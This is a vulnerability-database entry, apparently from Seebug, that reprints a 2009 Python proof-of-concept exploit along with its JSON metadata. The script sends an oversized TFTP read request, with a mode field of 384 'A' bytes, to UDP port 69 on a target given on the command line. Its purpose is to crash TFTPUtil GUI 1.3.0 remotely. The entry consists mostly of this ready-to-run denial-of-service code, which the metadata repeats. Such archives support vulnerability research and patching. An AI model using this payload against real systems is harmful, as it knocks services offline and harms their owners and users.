ID SSV:66845
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00
Description
No description provided by source.
#!/usr/bin/python
import socket
import sys
from time import *
#Download:http://www.brothersoft.com/tftputil-131537.html
#Note; Good Ramadan For all MuSLimS
if len(sys.argv)!=2:
print "[x]TFTPUtil GUI 1.3.0 GUI Remote Denial Of Service Exploit"
print "[x]Author : ThE g0bL!N"
print "[x]Big Thanx : His0k4\n"
print "[+]Usage: %s <target_ip>" %sys.argv[0]
sys.exit(0)
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
mode = "\x41"*384
filename = "test"
payload = "\x00\x01" + filename + "\x00" + mode + "\x00"
print "[x] Sending the payload..."
sleep(2)
s.sendto(payload, (sys.argv[1], 69))
print "[x] Done!"
# milw0rm.com [2009-08-26]
{"href": "https://www.seebug.org/vuldb/ssvid-66845", "status": "poc", "bulletinFamily": "exploit", "modified": "2014-07-01T00:00:00", "title": "TFTPUtil GUI 1.3.0 - Remote Denial of Service Exploit", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-66845", "cvelist": [], "description": "No description provided by source.", "viewCount": 1, "published": "2014-07-01T00:00:00", "sourceData": "\n #!/usr/bin/python\n\nimport socket\nimport sys\nfrom time import *\n\n#Download:http://www.brothersoft.com/tftputil-131537.html\n#Note; Good Ramadan For all MuSLimS\nif len(sys.argv)!=2:\n print "[x]TFTPUtil GUI 1.3.0 GUI Remote Denial Of Service Exploit"\n print "[x]Author : ThE g0bL!N"\n print "[x]Big Thanx : His0k4\\n"\n print "[+]Usage: %s <target_ip>" %sys.argv[0]\n sys.exit(0)\n\ns = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\nmode = "\\x41"*384\n\nfilename = "test"\n\npayload = "\\x00\\x01" + filename + "\\x00" + mode + "\\x00"\n\nprint "[x] Sending the payload..."\nsleep(2)\ns.sendto(payload, (sys.argv[1], 69))\nprint "[x] Done!"\n\n# milw0rm.com [2009-08-26]\n\n ", "id": "SSV:66845", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T13:46:00", "reporter": "Root", "enchantments": {"score": {"value": 0.1, "vector": "NONE", "modified": "2017-11-19T13:46:00", "rev": 2}, "dependencies": {"references": [], "modified": "2017-11-19T13:46:00", "rev": 2}, "vulnersScore": 0.1}, "references": [], "immutableFields": []}
{}